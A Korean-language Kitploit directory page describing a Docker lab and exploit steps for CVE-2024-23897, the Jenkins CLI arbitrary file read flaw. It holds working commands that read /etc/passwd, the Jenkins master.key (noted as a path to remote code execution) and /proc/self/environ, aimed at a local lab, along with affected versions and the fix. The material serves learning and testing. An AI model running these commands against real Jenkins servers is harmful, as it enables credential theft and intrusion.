Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-23897 — Docker 기반 랩 및 CVE-2024-23897용 익스플로잇 스크립트로, args4j expandAtFiles를 통한 Jenkins CLI의 치명적인 임의 파일 읽기 취약점을 다루며, RCE로 체이닝하는 단계를 포함합니다. | Kitploit
도구/GitHubGitHub/dungsocool/cve-2024-23897
Vulnerability ScannersExploitationWeb SecurityLearning & EducationLabs & Practice
GitHubdungsocool/cve-2024-23897

CVE-2024-23897

Docker 기반 랩 및 CVE-2024-23897용 익스플로잇 스크립트로, args4j expandAtFiles를 통한 Jenkins CLI의 치명적인 임의 파일 읽기 취약점을 다루며, RCE로 체이닝하는 단계를 포함합니다.

저장소 보기
571개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-23897 — Jenkins CLI 임의 파일 읽기

빠른 시작

root@kitploit:~
# 1. Start lab
docker-compose up -d

# 2. Wait ~30s, then download CLI tool
curl -O http://localhost:8080/jnlpJars/jenkins-cli.jar

# 3. Exploit — read /etc/passwd (full file)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/etc/passwd

# 4. Read master.key (chain to RCE)
java -jar jenkins-cli.jar -s http://localhost:8080 -http connect-node @/var/jenkins_home/secrets/master.key

# 5. Read environment variables
java -jar jenkins-cli.jar -s http://localhost:8080 -http help @/proc/self/environ

세부 정보

전체 기술 분석(베트남어)은 REPORT.md를 참조하세요.

항목값
CVSS9.8 (치명적)
영향받는 버전Jenkins <= 2.441, LTS <= 2.426.2
랩 버전jenkins/jenkins:2.426.2-lts
근본 원인서버 측 CLI에서 args4j expandAtFiles 활성화됨
수정Jenkins >= 2.442 / LTS >= 2.426.3으로 업그레이드

정리

root@kitploit:~
docker-compose down -v --remove-orphans
도구 다운로드